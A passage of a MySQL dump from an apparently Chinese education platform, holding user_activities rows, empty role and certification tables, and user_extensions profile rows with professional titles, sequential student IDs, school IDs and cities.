11:44:50',28),(33,'Principal',29,'Principal',29,'2019-01-25 11:44:50','2019-01-25 11:44:50',29),(34,'Principal',30,'Principal',30,'2019-01-25 11:44:50','2019-01-25 11:44:50',30),(35,'Principal',31,'Principal',31,'2019-03-13 16:32:19','2019-03-13 16:32:19',31),(36,'Principal',32,'Principal',32,'2019-03-13 16:32:20','2019-03-13 16:32:20',32),(37,'Principal',33,'Principal',33,'2019-03-13 16:32:20','2019-03-13 16:32:20',33),(38,'Principal',34,'Principal',34,'2019-03-13 16:32:20','2019-03-13 16:32:20',34),(39,'Principal',35,'Principal',35,'2019-03-13 16:32:20','2019-03-13 16:32:20',35),(40,'Principal',36,'Principal',36,'2019-03-13 16:32:20','2019-03-13 16:32:20',36),(41,'Principal',37,'Principal',37,'2019-03-13 16:32:20','2019-03-13 16:32:20',37),(42,'Principal',38,'Principal',38,'2019-03-13 16:32:20','2019-03-13 16:32:20',38),(43,'Principal',39,'Principal',39,'2019-03-13 16:32:21','2019-03-13 16:32:21',39),(44,'Principal',40,'Principal',40,'2019-03-13 16:32:21','2019-03-13 16:32:21',40),(45,'Principal',41,'Principal',41,'2019-03-21 21:28:44','2019-03-21 21:28:44',41),(46,'Principal',42,'Principal',42,'2019-04-09 15:27:41','2019-04-09 15:27:41',42),(47,'Principal',43,'Principal',43,'2019-04-17 09:49:36','2019-04-17 09:49:36',43),(48,'Principal',44,'Principal',44,'2019-04-18 11:06:17','2019-04-18 11:06:17',44),(49,'Principal',45,'Principal',45,'2019-06-09 11:31:04','2019-06-09 11:31:04',45),(50,'Principal',46,'Principal',46,'2019-08-06 08:33:43','2019-08-06 08:33:43',46),(51,'Principal',47,'Principal',47,'2019-08-06 09:10:25','2019-08-06 09:10:25',47),(52,'Principal',48,'Principal',48,'2019-08-06 09:24:30','2019-08-06 09:24:30',48),(53,'Principal',49,'Principal',49,'2019-08-07 09:33:05','2019-08-07 09:33:05',49),(54,'Principal',50,'Principal',50,'2019-08-07 09:37:08','2019-08-07 09:37:08',50),(55,'Principal',51,'Principal',51,'2019-08-07 14:53:28','2019-08-07 14:53:28',51),(56,'Principal',52,'Principal',52,'2019-08-07 15:44:39','2019-08-07 15:44:39',52),(57,'Principal',53,'Principal',53,'2019-08-13 09:30:25','2019-08-13 09:30:25',53),(58,'Principal',54,'Principal',54,'2019-08-14 16:50:06','2019-08-14 16:50:06',54),(59,'Principal',55,'Principal',55,'2019-08-17 08:59:42','2019-08-17 08:59:42',55),(60,'Principal',56,'Principal',56,'2019-09-16 09:59:25','2019-09-16 09:59:25',56),(61,'Principal',57,'Principal',57,'2019-10-10 16:48:10','2019-10-10 16:48:10',57),(62,'Principal',58,'Principal',58,'2019-10-19 09:24:20','2019-10-19 09:24:20',58),(64,'Principal',60,'Principal',60,'2019-10-29 10:00:26','2019-10-29 10:00:26',60),(65,'Principal',61,'Principal',61,'2019-10-29 17:07:24','2019-10-29 17:07:24',61),(66,'Principal',62,'Principal',62,'2019-10-29 17:08:25','2019-10-29 17:08:25',62),(67,'Principal',63,'Principal',63,'2019-10-31 18:37:10','2019-10-31 18:37:10',63),(68,'Principal',64,'Principal',64,'2019-10-31 18:37:10','2019-10-31 18:37:10',64),(69,'Principal',65,'Principal',65,'2019-10-31 18:37:10','2019-10-31 18:37:10',65),(70,'Principal',66,'Principal',66,'2019-10-31 18:37:10','2019-10-31 18:37:10',66),(71,'Principal',67,'Principal',67,'2019-10-31 18:37:10','2019-10-31 18:37:10',67),(72,'Principal',68,'Principal',68,'2019-10-31 18:37:11','2019-10-31 18:37:11',68),(73,'Principal',69,'Principal',69,'2019-10-31 18:37:11','2019-10-31 18:37:11',69),(74,'Principal',70,'Principal',70,'2019-10-31 18:37:11','2019-10-31 18:37:11',70),(75,'Principal',71,'Principal',71,'2019-10-31 18:37:11','2019-10-31 18:37:11',71),(77,'Principal',73,'Principal',73,'2019-11-25 11:25:31','2019-11-25 11:25:31',73),(78,'Principal',74,'Principal',74,'2020-02-01 12:47:12','2020-02-01 12:47:12',74),(79,'Principal',75,'Principal',75,'2020-02-01 18:52:39','2020-02-01 18:52:39',75),(80,'Principal',76,'Principal',76,'2020-02-01 20:34:46','2020-02-01 20:34:46',76),(81,'Principal',77,'Principal',77,'2020-02-01 22:26:36','2020-02-01 22:26:36',77),(82,'Principal',78,'Principal',78,'2020-02-03 17:19:19','2020-02-03 17:19:19',78),(83,'Principal',79,'Principal',79,'2020-02-04 22:00:19','2020-02-04 22:00:19',79),(84,'Principal',80,'Principal',80,'2020-02-04 22:09:45','2020-02-04 22:09:45',80),(85,'Principal',81,'Principal',81,'2020-02-05 10:29:30','2020-02-05 10:29:30',81),(86,'Principal',82,'Principal',82,'2020-02-05 10:30:48','2020-02-05 10:30:48',82),(87,'Principal',83,'Principal',83,'2020-02-05 10:31:59','2020-02-05 10:31:59',83),(88,'Principal',84,'Principal',84,'2020-02-05 10:33:10','2020-02-05 10:33:10',84),(89,'Principal',85,'Principal',85,'2020-02-05 10:35:26','2020-02-05 10:35:26',85),(90,'Principal',86,'Principal',86,'2020-02-05 10:38:36','2020-02-05 10:38:36',86),(91,'Principal',87,'Principal',87,'2020-02-05 10:39:59','2020-02-05 10:39:59',87),(92,'Principal',88,'Principal',88,'2020-02-05 10:43:18','2020-02-05 10:43:18',88),(93,'Principal',89,'Principal',89,'2020-02-05 10:54:45','2020-02-05 10:54:45',89),(94,'Principal',90,'Principal',90,'2020-02-05 10:54:48','2020-02-05 10:54:48',90),(95,'Principal',91,'Principal',91,'2020-02-05 10:55:15','2020-02-05 10:55:15',91),(96,'Principal',92,'Principal',92,'2020-02-05 10:56:00','2020-02-05 10:56:00',92),(97,'Principal',93,'Principal',93,'2020-02-05 10:58:38','2020-02-05 10:58:38',93),(98,'Principal',94,'Principal',94,'2020-02-05 11:02:30','2020-02-05 11:02:30',94),(99,'Principal',95,'Principal',95,'2020-02-05 11:05:02','2020-02-05 11:05:02',95),(100,'Principal',96,'Principal',96,'2020-02-05 11:24:55','2020-02-05 11:24:55',96),(101,'Principal',97,'Principal',97,'2020-02-05 11:41:14','2020-02-05 11:41:14',97),(102,'Principal',98,'Principal',98,'2020-02-05 12:24:57','2020-02-05 12:24:57',98),(103,'Principal',99,'Principal',99,'2020-02-05 14:48:32','2020-02-05 14:48:32',99),(104,'Principal',100,'Principal',100,'2020-02-05 14:53:15','2020-02-05 14:53:15',100),(105,'Principal',101,'Principal',101,'2020-02-05 15:22:57','2020-02-05 15:22:57',101),(106,'Principal',102,'Principal',102,'2020-02-05 16:25:27','2020-02-05 16:25:27',102),(107,'Principal',103,'Principal',103,'2020-02-10 12:21:33','2020-02-10 12:21:33',103),(108,'Principal',104,'Principal',104,'2020-03-19 13:54:38','2020-03-19 13:54:38',104),(109,'Principal',105,'Principal',105,'2020-03-19 15:08:51','2020-03-19 15:08:51',105),(110,'Principal',106,'Principal',106,'2020-03-19 15:09:00','2020-03-19 15:09:00',106),(111,'Principal',107,'Principal',107,'2020-03-19 15:10:11','2020-03-19 15:10:11',107),(112,'Principal',108,'Principal',108,'2020-03-19 15:12:55','2020-03-19 15:12:55',108),(113,'Principal',109,'Principal',109,'2020-03-19 15:13:24','2020-03-19 15:13:24',109),(114,'Principal',110,'Principal',110,'2020-03-23 08:27:59','2020-03-23 08:27:59',110),(115,'Principal',111,'Principal',111,'2020-07-03 11:51:05','2020-07-03 11:51:05',111),(116,'Principal',112,'Principal',112,'2020-08-12 10:41:20','2020-08-12 10:41:20',112),(117,'Principal',113,'Principal',113,'2020-08-13 10:19:02','2020-08-13 10:19:02',113),(118,'Principal',114,'Principal',114,'2020-08-14 08:58:42','2020-08-14 08:58:42',114),(119,'Principal',115,'Principal',115,'2020-08-18 16:43:47','2020-08-18 16:43:47',115),(120,'Principal',116,'Principal',116,'2020-09-29 17:20:40','2020-09-29 17:20:40',116),(121,'Principal',117,'Principal',117,'2020-10-21 16:47:58','2020-10-21 16:47:58',117),(122,'Principal',118,'Principal',118,'2020-12-01 18:18:16','2020-12-01 18:18:16',118),(123,'Principal',119,'Principal',119,'2020-12-02 13:18:32','2020-12-02 13:18:32',119),(124,'Principal',120,'Principal',120,'2020-12-14 14:31:53','2020-12-14 14:31:53',120),(125,'Principal',121,'Principal',121,'2020-12-16 16:06:31','2020-12-16 16:06:31',121),(126,'Principal',122,'Principal',122,'2020-12-16 18:54:54','2020-12-16 18:54:54',122),(127,'Principal',123,'Principal',123,'2020-12-17 10:03:56','2020-12-17 10:03:56',123),(128,'Principal',124,'Principal',124,'2020-12-17 11:17:58','2020-12-17 11:17:58',124),(129,'Principal',125,'Principal',125,'2020-12-17 11:22:00','2020-12-17 11:22:00',125),(130,'Principal',126,'Principal',126,'2020-12-18 18:53:33','2020-12-18 18:53:33',126),(131,'Principal',127,'Principal',127,'2020-12-22 19:48:05','2020-12-22 19:48:05',127),(132,'Principal',128,'Principal',128,'2020-12-24 15:19:18','2020-12-24 15:19:18',128),(133,'Principal',129,'Principal',129,'2020-12-27 11:43:54','2020-12-27 11:43:54',129),(134,'Principal',130,'Principal',130,'2020-12-28 11:28:50','2020-12-28 11:28:50',130),(135,'Principal',131,'Principal',131,'2020-12-29 11:32:47','2020-12-29 11:32:47',131),(136,'Principal',132,'Principal',132,'2020-12-29 15:12:24','2020-12-29 15:12:24',132),(137,'Principal',133,'Principal',133,'2020-12-29 15:21:31','2020-12-29 15:21:31',133),(138,'Principal',134,'Principal',134,'2020-12-29 15:24:04','2020-12-29 15:24:04',134),(139,'Principal',135,'Principal',135,'2020-12-30 10:05:30','2020-12-30 10:05:30',135),(140,'Principal',136,'Principal',136,'2021-01-05 10:33:26','2021-01-05 10:33:26',136),(141,'Principal',137,'Principal',137,'2021-01-05 18:41:43','2021-01-05 18:41:43',137),(142,'Principal',138,'Principal',138,'2021-01-06 10:52:46','2021-01-06 10:52:46',138),(143,'Principal',139,'Principal',139,'2021-01-06 11:04:59','2021-01-06 11:04:59',139),(144,'Principal',140,'Principal',140,'2021-01-06 11:12:28','2021-01-06 11:12:28',140),(145,'Principal',141,'Principal',141,'2021-01-06 11:21:36','2021-01-06 11:21:36',141),(146,'Principal',142,'Principal',142,'2021-01-06 11:29:05','2021-01-06 11:29:05',142),(147,'Principal',143,'Principal',143,'2021-01-06 11:39:56','2021-01-06 11:39:56',143),(148,'Principal',144,'Principal',144,'2021-01-06 11:47:58','2021-01-06 11:47:58',144),(149,'Principal',145,'Principal',145,'2021-01-06 14:02:22','2021-01-06 14:02:22',145),(150,'Principal',147,'Principal',147,'2021-01-06 14:44:32','2021-01-06 14:44:32',147),(151,'Principal',148,'Principal',148,'2021-01-06 14:55:47','2021-01-06 14:55:47',148),(152,'Principal',149,'Principal',149,'2021-01-06 15:44:02','2021-01-06 15:44:02',149),(153,'Principal',150,'Principal',150,'2021-01-06 15:49:26','2021-01-06 15:49:26',150),(154,'Principal',151,'Principal',151,'2021-01-06 16:24:55','2021-01-06 16:24:55',151),(155,'Principal',152,'Principal',152,'2021-01-07 15:22:44','2021-01-07 15:22:44',152),(156,'Principal',153,'Principal',153,'2021-01-13 11:04:28','2021-01-13 11:04:28',153),(157,'Principal',155,'Principal',155,'2021-01-22 15:35:25','2021-01-22 15:35:25',155),(158,'Principal',156,'Principal',156,'2021-01-26 09:20:06','2021-01-26 09:20:06',156),(159,'Principal',157,'Principal',157,'2021-01-26 18:21:59','2021-01-26 18:21:59',157),(160,'Principal',158,'Principal',158,'2021-01-28 15:58:34','2021-01-28 15:58:34',158),(161,'Principal',159,'Principal',159,'2021-01-28 18:25:26','2021-01-28 18:25:26',159),(162,'Principal',160,'Principal',160,'2021-01-28 23:13:22','2021-01-28 23:13:22',160),(163,'Principal',161,'Principal',161,'2021-02-20 09:25:50','2021-02-20 09:25:50',161),(164,'Principal',162,'Principal',162,'2021-02-20 09:26:02','2021-02-20 09:26:02',162),(165,'Principal',163,'Principal',163,'2021-02-20 09:32:11','2021-02-20 09:32:11',163),(166,'Principal',164,'Principal',164,'2021-02-20 09:37:17','2021-02-20 09:37:17',164),(167,'Principal',165,'Principal',165,'2021-02-20 09:43:55','2021-02-20 09:43:55',165),(168,'Principal',166,'Principal',166,'2021-02-20 09:44:37','2021-02-20 09:44:37',166),(169,'Principal',167,'Principal',167,'2021-02-20 09:48:10','2021-02-20 09:48:10',167),(170,'Principal',168,'Principal',168,'2021-02-20 09:58:39','2021-02-20 09:58:39',168),(171,'Principal',169,'Principal',169,'2021-02-20 10:13:41','2021-02-20 10:13:41',169),(172,'Principal',170,'Principal',170,'2021-02-20 10:34:58','2021-02-20 10:34:58',170),(173,'Principal',171,'Principal',171,'2021-02-20 10:41:53','2021-02-20 10:41:53',171),(174,'Principal',172,'Principal',172,'2021-02-20 11:02:04','2021-02-20 11:02:04',172),(175,'Principal',173,'Principal',173,'2021-02-20 13:26:02','2021-02-20 13:26:02',173),(176,'Principal',174,'Principal',174,'2021-02-20 14:13:02','2021-02-20 14:13:02',174),(177,'Principal',175,'Principal',175,'2021-02-20 14:22:15','2021-02-20 14:22:15',175),(178,'Principal',176,'Principal',176,'2021-02-20 19:46:55','2021-02-20 19:46:55',176),(179,'Principal',177,'Principal',177,'2021-02-21 14:02:22','2021-02-21 14:02:22',177),(180,'Principal',178,'Principal',178,'2021-02-22 22:36:59','2021-02-22 22:36:59',178),(181,'Principal',179,'Principal',179,'2021-02-24 14:52:38','2021-02-24 14:52:38',179),(182,'Principal',180,'Principal',180,'2021-02-24 17:51:45','2021-02-24 17:51:45',180),(183,'Principal',181,'Principal',181,'2021-02-25 08:42:04','2021-02-25 08:42:04',181),(184,'Principal',182,'Principal',182,'2021-02-25 08:49:06','2021-02-25 08:49:06',182),(185,'Principal',183,'Principal',183,'2021-02-25 14:01:00','2021-02-25 14:01:00',183),(186,'Principal',184,'Principal',184,'2021-02-26 10:24:39','2021-02-26 10:24:39',184),(187,'Principal',185,'Principal',185,'2021-02-26 20:15:44','2021-02-26 20:15:44',185),(188,'Principal',186,'Principal',186,'2021-03-01 19:03:56','2021-03-01 19:03:56',186),(189,'Principal',187,'Principal',187,'2021-03-01 22:07:13','2021-03-01 22:07:13',187),(190,'Principal',189,'Principal',189,'2021-03-03 07:35:42','2021-03-03 07:35:42',189),(191,'Principal',190,'Principal',190,'2021-03-04 10:12:27','2021-03-04 10:12:27',190),(192,'Principal',191,'Principal',191,'2021-03-04 10:16:31','2021-03-04 10:16:31',191),(193,'Principal',192,'Principal',192,'2021-03-04 10:17:21','2021-03-04 10:17:21',192),(194,'Principal',193,'Principal',193,'2021-03-04 10:19:53','2021-03-04 10:19:53',193),(195,'Principal',194,'Principal',194,'2021-03-04 10:19:59','2021-03-04 10:19:59',194),(196,'Principal',195,'Principal',195,'2021-03-04 10:20:06','2021-03-04 10:20:06',195),(197,'Principal',196,'Principal',196,'2021-03-04 10:27:32','2021-03-04 10:27:32',196),(198,'Principal',197,'Principal',197,'2021-03-04 10:28:07','2021-03-04 10:28:07',197),(199,'Principal',198,'Principal',198,'2021-03-04 10:29:41','2021-03-04 10:29:41',198),(200,'Principal',199,'Principal',199,'2021-03-04 10:42:07','2021-03-04 10:42:07',199),(201,'Principal',200,'Principal',200,'2021-03-04 11:10:46','2021-03-04 11:10:46',200),(202,'Principal',201,'Principal',201,'2021-03-05 10:32:57','2021-03-05 10:32:57',201),(203,'Principal',202,'Principal',202,'2021-03-05 11:23:45','2021-03-05 11:23:45',202),(204,'Principal',203,'Principal',203,'2021-03-05 13:12:22','2021-03-05 13:12:22',203),(205,'Principal',204,'Principal',204,'2021-03-05 14:19:55','2021-03-05 14:19:55',204),(206,'Principal',205,'Principal',205,'2021-03-05 14:37:57','2021-03-05 14:37:57',205),(207,'Principal',206,'Principal',206,'2021-03-05 22:04:34','2021-03-05 22:04:34',206),(208,'Principal',207,'Principal',207,'2021-03-06 17:19:19','2021-03-06 17:19:19',207),(209,'Principal',208,'Principal',208,'2021-03-06 17:26:16','2021-03-06 17:26:16',208),(210,'Principal',209,'Principal',209,'2021-03-06 18:04:36','2021-03-06 18:04:36',209),(211,'Principal',210,'Principal',210,'2021-03-06 19:56:38','2021-03-06 19:56:38',210),(212,'Principal',211,'Principal',211,'2021-03-07 23:20:59','2021-03-07 23:20:59',211),(213,'Principal',212,'Principal',212,'2021-03-09 16:01:16','2021-03-09 16:01:16',212),(214,'Principal',213,'Principal',213,'2021-03-09 16:20:16','2021-03-09 16:20:16',213),(215,'Principal',214,'Principal',214,'2021-03-09 16:43:12','2021-03-09 16:43:12',214),(216,'Principal',215,'Principal',215,'2021-03-09 21:49:19','2021-03-09 21:49:19',215),(217,'Principal',216,'Principal',216,'2021-03-10 18:03:19','2021-03-10 18:03:19',216),(218,'Principal',217,'Principal',217,'2021-03-11 07:02:07','2021-03-11 07:02:07',217),(219,'Principal',218,'Principal',218,'2021-03-11 15:05:29','2021-03-11 15:05:29',218),(220,'Principal',219,'Principal',219,'2021-03-12 20:36:44','2021-03-12 20:36:44',219),(221,'Principal',220,'Principal',220,'2021-03-13 11:50:02','2021-03-13 11:50:02',220),(222,'Principal',221,'Principal',221,'2021-03-13 14:46:34','2021-03-13 14:46:34',221);
|
||
/*!40000 ALTER TABLE `user_activities` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `user_admin_roles`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `user_admin_roles`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `user_admin_roles` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`admin_role_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `user_admin_roles`
|
||
--
|
||
|
||
LOCK TABLES `user_admin_roles` WRITE;
|
||
/*!40000 ALTER TABLE `user_admin_roles` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `user_admin_roles` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `user_day_certifications`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `user_day_certifications`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `user_day_certifications` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`status` int(11) DEFAULT '0',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_user_day_certifications_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `user_day_certifications`
|
||
--
|
||
|
||
LOCK TABLES `user_day_certifications` WRITE;
|
||
/*!40000 ALTER TABLE `user_day_certifications` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `user_day_certifications` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `user_extensions`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `user_extensions`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `user_extensions` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) NOT NULL,
|
||
`birthday` date DEFAULT NULL,
|
||
`brief_introduction` varchar(255) DEFAULT NULL,
|
||
`gender` int(11) DEFAULT NULL,
|
||
`location` varchar(255) DEFAULT NULL,
|
||
`occupation` varchar(255) DEFAULT NULL,
|
||
`work_experience` int(11) DEFAULT NULL,
|
||
`zip_code` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`identity` int(11) DEFAULT NULL,
|
||
`technical_title` varchar(255) DEFAULT NULL,
|
||
`student_id` varchar(255) DEFAULT NULL,
|
||
`teacher_realname` varchar(255) DEFAULT NULL,
|
||
`student_realname` varchar(255) DEFAULT NULL,
|
||
`location_city` varchar(255) DEFAULT NULL,
|
||
`school_id` int(11) DEFAULT NULL,
|
||
`description` varchar(255) DEFAULT '',
|
||
`department_id` int(11) DEFAULT NULL,
|
||
`province` text,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_user_extensions_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=218 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `user_extensions`
|
||
--
|
||
|
||
LOCK TABLES `user_extensions` WRITE;
|
||
/*!40000 ALTER TABLE `user_extensions` DISABLE KEYS */;
|
||
INSERT INTO `user_extensions` VALUES (1,1,NULL,'大家好,欢迎大家',0,'三一大道',NULL,NULL,NULL,'2018-07-02 11:22:33','2020-08-21 08:53:25',0,'教授',NULL,NULL,NULL,'长沙',3159,'',NULL,'湖南'),(2,3,NULL,NULL,0,NULL,NULL,NULL,NULL,'2018-07-06 10:52:18','2018-07-06 10:52:50',0,'教授',NULL,NULL,NULL,NULL,15,'',NULL,NULL),(3,4,NULL,NULL,0,NULL,NULL,NULL,NULL,'2018-07-08 10:28:20','2018-07-11 09:26:28',0,'讲师',NULL,NULL,NULL,NULL,11,'',1,NULL),(4,5,NULL,NULL,1,NULL,NULL,NULL,NULL,'2018-07-20 09:16:41','2018-08-22 16:17:26',0,'副教授',NULL,NULL,NULL,NULL,117,'',NULL,NULL),(5,6,NULL,NULL,0,NULL,NULL,NULL,NULL,'2018-07-20 14:47:43','2018-07-20 14:48:34',0,'教授',NULL,NULL,NULL,NULL,117,'',NULL,NULL),(6,7,NULL,NULL,0,NULL,NULL,NULL,NULL,'2018-07-30 09:39:16','2018-07-30 09:39:51',1,NULL,'20183214561',NULL,NULL,NULL,117,'',NULL,NULL),(7,8,NULL,NULL,0,'1817324275',NULL,NULL,NULL,'2018-08-03 19:28:18','2019-09-20 09:22:12',0,'讲师',NULL,NULL,NULL,'东城',117,'',NULL,'北京'),(8,9,NULL,NULL,0,NULL,NULL,NULL,NULL,'2018-08-06 15:18:46','2018-11-14 15:31:42',2,'工程师',NULL,NULL,NULL,NULL,3159,'',NULL,NULL),(9,10,NULL,NULL,0,NULL,NULL,NULL,NULL,'2018-08-06 15:24:59','2018-08-06 15:27:59',2,'部门管理者',NULL,NULL,NULL,NULL,3159,'',NULL,NULL),(10,11,NULL,NULL,0,NULL,NULL,NULL,NULL,'2018-08-21 17:13:35','2018-08-22 15:48:22',0,'教授',NULL,NULL,NULL,NULL,117,'',3,NULL),(11,12,NULL,NULL,0,NULL,NULL,NULL,NULL,'2018-08-22 15:59:03','2018-08-22 15:59:29',2,'高级工程师',NULL,NULL,NULL,NULL,1976,'',NULL,NULL),(12,13,NULL,NULL,0,NULL,NULL,NULL,NULL,'2018-08-30 22:28:07','2018-08-30 22:29:30',2,'部门管理者',NULL,NULL,NULL,NULL,2492,'',NULL,NULL),(13,14,NULL,NULL,0,NULL,NULL,NULL,NULL,'2018-09-05 13:54:44','2018-09-05 13:59:03',2,'企业管理者',NULL,NULL,NULL,NULL,3160,'',NULL,NULL),(14,15,NULL,NULL,0,NULL,NULL,NULL,NULL,'2018-09-07 12:37:19','2018-09-07 12:38:33',2,'部门管理者',NULL,NULL,NULL,NULL,3161,'',NULL,NULL),(15,16,NULL,NULL,1,'p27318694',NULL,NULL,NULL,'2018-10-10 09:29:20','2019-09-16 16:01:31',0,'副教授',NULL,NULL,NULL,'崇明',1976,'',NULL,'上海'),(16,17,NULL,NULL,0,NULL,NULL,NULL,NULL,'2018-10-12 17:36:42','2018-10-12 17:40:25',2,'部门管理者',NULL,NULL,NULL,NULL,3162,'',NULL,NULL),(17,18,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2018-12-19 09:06:30','2018-12-19 09:06:30',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'',NULL,NULL),(18,19,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-01-15 09:36:50','2019-01-15 09:37:46',0,'助教',NULL,NULL,NULL,NULL,117,'',NULL,NULL),(19,20,NULL,NULL,0,'101',NULL,NULL,NULL,'2019-01-18 09:54:22','2019-08-22 10:32:25',2,'助理工程师',NULL,NULL,NULL,'赣州',1243,'',NULL,'江西'),(20,21,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-01-25 11:44:49','2019-01-25 11:44:49',1,NULL,'15607310001',NULL,NULL,NULL,117,'',NULL,NULL),(21,22,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-01-25 11:44:49','2019-01-25 11:44:49',1,NULL,'15607310002',NULL,NULL,NULL,117,'',NULL,NULL),(22,23,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-01-25 11:44:49','2019-01-25 11:44:49',1,NULL,'15607310003',NULL,NULL,NULL,117,'',NULL,NULL),(23,24,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-01-25 11:44:49','2019-01-25 11:44:49',1,NULL,'15607310004',NULL,NULL,NULL,117,'',NULL,NULL),(24,25,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-01-25 11:44:50','2019-01-25 11:44:50',1,NULL,'15607310005',NULL,NULL,NULL,117,'',NULL,NULL),(25,26,NULL,NULL,0,'东大街',NULL,NULL,NULL,'2019-01-25 11:44:50','2019-11-03 12:09:20',1,NULL,'15607310006',NULL,NULL,'丰台',117,'',NULL,'北京'),(26,27,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-01-25 11:44:50','2019-01-25 11:44:50',1,NULL,'15607310007',NULL,NULL,NULL,117,'',NULL,NULL),(27,28,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-01-25 11:44:50','2019-01-25 11:44:50',1,NULL,'15607310008',NULL,NULL,NULL,117,'',NULL,NULL),(28,29,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-01-25 11:44:50','2019-01-25 11:44:50',1,NULL,'15607310009',NULL,NULL,NULL,117,'',NULL,NULL),(29,30,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-01-25 11:44:50','2019-01-25 11:44:50',1,NULL,'15607310010',NULL,NULL,NULL,117,'',NULL,NULL),(30,31,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-03-13 16:32:19','2019-03-13 16:32:19',1,NULL,'15607320001',NULL,NULL,NULL,117,'',NULL,NULL),(31,32,NULL,NULL,0,'大三房',NULL,NULL,NULL,'2019-03-13 16:32:20','2019-10-28 15:11:08',1,NULL,'15607320002',NULL,NULL,'东城',117,'',NULL,'北京'),(32,33,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-03-13 16:32:20','2019-03-13 16:32:20',1,NULL,'15607320003',NULL,NULL,NULL,117,'',NULL,NULL),(33,34,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-03-13 16:32:20','2019-03-13 16:32:20',1,NULL,'15607320004',NULL,NULL,NULL,117,'',NULL,NULL),(34,35,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-03-13 16:32:20','2019-03-13 16:32:20',1,NULL,'15607320005',NULL,NULL,NULL,117,'',NULL,NULL),(35,36,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-03-13 16:32:20','2019-03-13 16:32:20',1,NULL,'15607320006',NULL,NULL,NULL,117,'',NULL,NULL),(36,37,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-03-13 16:32:20','2019-03-13 16:32:20',1,NULL,'15607320007',NULL,NULL,NULL,117,'',NULL,NULL),(37,38,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-03-13 16:32:20','2019-03-13 16:32:20',1,NULL,'15607320008',NULL,NULL,NULL,117,'',NULL,NULL),(38,39,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-03-13 16:32:21','2019-03-13 16:32:21',1,NULL,'15607320009',NULL,NULL,NULL,117,'',NULL,NULL),(39,40,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-03-13 16:32:21','2019-03-13 16:32:21',1,NULL,'15607320010',NULL,NULL,NULL,117,'',NULL,NULL),(40,41,NULL,NULL,1,'p26913408',NULL,NULL,NULL,'2019-03-21 21:28:44','2019-10-28 15:08:46',2,'工程师',NULL,NULL,NULL,'东城',266,'',NULL,'北京'),(41,42,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-04-09 15:27:41','2019-04-09 15:28:44',2,'助理工程师',NULL,NULL,NULL,NULL,117,'',3,NULL),(42,43,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-04-17 09:49:36','2019-04-17 09:50:34',2,'工程师',NULL,NULL,NULL,NULL,117,'',NULL,NULL),(43,44,NULL,NULL,0,NULL,NULL,NULL,NULL,'2019-04-18 11:06:17','2019-04-18 11:07:46',0,'讲师',NULL,NULL,NULL,NULL,1578,'',NULL,NULL),(44,45,NULL,NULL,0,'1809238013',NULL,NULL,NULL,'2019-06-09 11:31:04','2020-03-27 19:16:13',0,'讲师',NULL,NULL,NULL,'西安',117,'',NULL,'陕西'),(45,46,NULL,NULL,0,'丰台东大街53号请求',NULL,NULL,NULL,'2019-08-06 08:33:43','2021-03-03 11:16:02',2,'工程师',NULL,NULL,NULL,'丰台',1976,'',NULL,'北京'),(46,47,NULL,NULL,0,'山里的人',NULL,NULL,NULL,'2019-08-06 09:10:25','2019-08-06 